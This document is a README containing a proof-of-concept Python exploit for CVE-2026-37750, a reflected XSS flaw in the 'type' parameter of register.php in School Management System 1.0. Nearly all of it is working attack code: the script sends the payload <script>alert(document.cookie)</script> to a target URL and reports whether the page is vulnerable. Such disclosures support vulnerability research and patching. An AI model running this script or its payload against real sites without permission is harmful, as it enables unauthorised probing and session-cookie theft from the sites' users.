README.md
Rendering markdown...
#!/usr/bin/env python3
# Exploit Title: School Management System 1.0 - Reflected XSS
# Date: 2026-04-16
# Exploit Author: Varad AP Mene ([email protected])
# Vendor Homepage: https://github.com/mahmoudai1/school-management-system
# Software Link: https://github.com/mahmoudai1/school-management-system
# Version: 1.0
# Tested on: Windows 10 / XAMPP, Kali Linux
# CVE: CVE-2026-37750
import requests
import argparse
import sys
def verify_xss(base_url):
url = f"{base_url}/register.php"
payload = "<script>alert(document.cookie)</script>"
params = {'type': payload}
session = requests.Session()
session.headers.update({'User-Agent': 'Mozilla/5.0'})
print(f"[*] Target : {url}")
print(f"[*] Payload : {payload}")
r = session.get(url, params=params, timeout=10)
if payload in r.text:
print(f"[+] VULNERABLE! XSS reflected unescaped!")
print(f"[+] PoC URL: {r.url}")
return True
else:
print(f"[-] Not vulnerable.")
return False
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--url', required=True, help='Target URL')
args = parser.parse_args()
print("=" * 60)
print("CVE-2026-37750 — Reflected XSS")
print("Product: School Management System 1.0")
print("Author : Varad AP Mene")
print("=" * 60)
try:
result = verify_xss(args.url.rstrip('/'))
sys.exit(0 if result else 1)
except Exception as e:
print(f"[-] Error: {e}")
sys.exit(1)
if __name__ == '__main__':
main()